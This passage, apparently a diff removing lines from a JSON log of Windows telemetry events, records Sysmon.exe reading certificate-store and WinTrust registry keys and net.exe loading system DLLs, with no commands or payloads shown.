"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - 
"timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "drprov.dll", - "image_path": "C:\\Windows\\System32\\drprov.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909490000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "sspicli.dll", - "image_path": "C:\\Windows\\System32\\sspicli.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "winsta.dll", - "image_path": "C:\\Windows\\System32\\winsta.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "ntlanman.dll", - "image_path": "C:\\Windows\\System32\\ntlanman.dll", - "pid": 6292, - "process_name": 
"net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909810016, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_value": "Disallowed", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - 
"timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 